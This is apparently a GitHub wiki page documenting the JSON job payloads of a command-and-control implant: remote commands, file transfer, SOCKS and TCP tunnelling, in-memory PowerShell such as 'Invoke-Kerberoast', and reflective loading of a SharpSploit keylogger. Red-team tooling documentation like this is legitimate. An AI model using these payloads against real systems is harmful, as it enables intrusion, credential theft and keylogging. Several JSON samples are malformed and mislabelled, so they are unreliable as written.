Skip to content

Job Payloads

Jump to bottom
p3nt4 edited this page Feb 25, 2022 · 15 revisions

Job payloads

Job payloads are in the format {Type: "", Options: {}} and can be implemented in anyway desired, although using standardized payloads will enable more compatibility for modules and clients down the road.

The following job payloads are currently defined:

Command

Payload:

{
  "type":"command", 
  "options":{
    "path":".", // The path to execute the command in (Optional)
    "cmd":"hostname" // The command
  }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "John-PC\r\n", // The stdout and stderr of the command
  "jobId": "hYSVr8AR240BQ86OcWQ8jGkgi2Ix2oBU"
}

Exit

Payload:

{
  "type":"exit", 
  "options":{}
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "Bye Bye!", // A polite good bye message
  "jobId": "hYSVr8AR240BQ86OcWQ8jGkgi2Ix2oBU"
}

Configure

Payload:

{
  "type":"configure",
  "options":{
    "config":{"sleep":"5"} // An object containing the configuration items to modify
  }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "{\"sleep\":\"5\",\"maxrequestsize\":\"50000\",\"id\":\"O4jRCnANBHj4StyFIbt7SYon3d797cDC\"}", // The new configuration of the implant (as a string)
  "jobId": "IbaWXsw94KukCs9gmfjTq1Jj09SXQRdW"
}

Download

Payload:

{
  "type":"download",
  "options":{
    "file":"calc.bat", // The absolute or relative path where to download the file
    "filename":"calc.bat", // The original filename of the file, used if "file" is a directory
    "pipe_id":"MYV7fuK6o4seL45Zb0IKlzKgD9WBbhSv", // The pipe to load the file from
    "length":20, // The size of the file in bytes
    "path":"C:\\Temp" // The path where to execute the Download (if the file option is a relative path)
  }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "C:\\Temp\\calc.bat", // The path where the file was downloaded
  "jobId": "MYV7fuK6o4seL45Zb0IKlzKgD9WBbhSv"
}

Upload

Payload:

{
  "type":"upload",
  "options":{
    "file":"calc.bat", // The absolute or relative path of the file to upload
    "pipe_id":"MYV7fuK6o4seL45Zb0IKlzKgD9WBbhSv", // The pipe to upload the file to
    "path":"C:\\Temp" // The path where to execute the Download (if the file option is a relative path)
  }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "C:\\Temp\\calc.bat", // The path of the uploaded file
  "jobId": "9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB"
}

CD

Payload:

{
  "type":"cd",
  "options":{
    "dir":"Temp", // The absolute or relative path of the directory to CD into
    "path":"C:\\" // The path where to execute the CD from (if the dir option is a relative path)
  }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "C:\\Temp", // The new directory
  "jobId": "9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB"
}

Interactive

Payload:

{
  "type":"socks",
  "options":{
    "pipe_id":"9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB", // The pipe the process needs to interact with
    "filename": "cmd.exe", // The program to execute
    "path": // The path to execute it from
  }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "Process Terminated!", 
  "jobId": "9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB"
}

Socks

Payload:

{
  "type":"socks",
  "options":{
    "pipe_id":"9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB", // The pipe the socks proxy needs to connect to
  }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "Connection Closed",
  "jobId": "9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB"
}

TCP Forwarding

Payload:

{
  "type":"tcp_fwd",
  "options":{
    "pipe_id":"9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB", // The pipe the tcp stream needs to be connected to
    "host": www.google.com,
    "port": 443
  }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "Connection Closed",
  "jobId": "9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB"
}

Powershell Execution

Payload:

{
    type:"posh_in_mem", 
    options:{
        "pipe_id":"MYV7fuK6o4seL45Zb0IKlzKgD9WBbhSv", // The pipe to load the powershell file from
        length: "12345", // The length of the powershell file
        command: "Invoke-Kerberoast" // A command to add at the end of the script
    }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "John-PC\r\n", // The stdout and stderr of the command
  "jobId": "hYSVr8AR240BQ86OcWQ8jGkgi2Ix2oBU",
}

Reflected Assembly Execution

Payload:

{
    type:"posh_in_mem", 
    options:{
        pipe_id: "9EPJ5IJhvLZBi3pWeyfjtvlHE40YIyeB", // The pipe to load the assembly file from
        "length": "12345", 
        "filename": "SharpSploit.dll", // The name of the assembly
        "class":  "SharpSploit.Enumeration.Keylogger" // The class to run
        "method": "StartKeylogger" // The method to run
        "arguments": "[int]25" // Argumentlist in format: MyString,[bool]true,[int]21
        "cache": true // Allow caching of assembly file
    }
}

Jobresult:

{
  "n": 0,
  "moreData": false,
  "error": false,
  "result": "John-PC\r\n", // The stdout and stderr of the command
  "jobId": "hYSVr8AR240BQ86OcWQ8jGkgi2Ix2oBU",
}
Clone this wiki locally